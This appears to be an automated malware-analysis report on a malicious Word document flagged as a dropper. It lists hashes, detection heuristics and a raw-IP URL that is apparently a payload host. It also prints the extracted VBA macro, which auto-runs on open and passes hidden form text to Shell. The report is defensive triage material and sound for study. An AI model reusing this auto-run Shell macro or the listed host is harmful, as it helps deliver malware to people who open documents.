Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 09cfcc51dd91c7e1…

MALICIOUS

Office (OLE)

98.0 KB Created: 2019-06-11 06:15:00 Authoring application: Microsoft Office Word First seen: 2021-04-10
MD5: ddef1bafcc0dc92295cb9d70db1c2422 SHA-1: 2c7ad6dfc15389b424d284f8eaa571379acb870b SHA-256: 09cfcc51dd91c7e16f8936f9f47842276974e0d5fe993566911e031b37e98d63
150 Risk Score

Heuristics 5

  • ClamAV: Doc.Dropper.Agent-6993623-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6993623-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell Replace(UserForm1.TextBox1.Text, "22:22", time)
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub document_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://185.176.221.103/m1 In document text (OLE body)
    • http://tl.symcd.com0&In document text (OLE body)
    • http://t2.symcb.com0In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://tl.symcb.com/tl.crl0In document text (OLE body)
    • https://www.thawte.com/cps0/In document text (OLE body)
    • https://www.thawte.com/repository0WIn document text (OLE body)
    • http://tl.symcb.com/tl.crt0In document text (OLE body)
    • http://t1.symcb.com/ThawtePCA.crl0In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas🔏 SignedVBA project digital signature
Covers VBA source only — not the compiled p-code. A digital signature does not by itself mean the macro is safe.
vba-macro oletools.olevba.extract_macros (decoded VBA source) 780 bytes
SHA-256: ba80ba07d15454ff75fac5fc3d7a3e40f4645c8a63c9750209b59811c316b760
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub document_open()
Dim time
time = Format(Now + TimeSerial(0, 0, 17), "hh:mm")


Shell Replace(UserForm1.TextBox1.Text, "22:22", time)
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{48F4B438-B4E8-42B2-9E67-3CCDF3ADF249}{42482B17-7581-406D-AD6F-20833BD36140}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False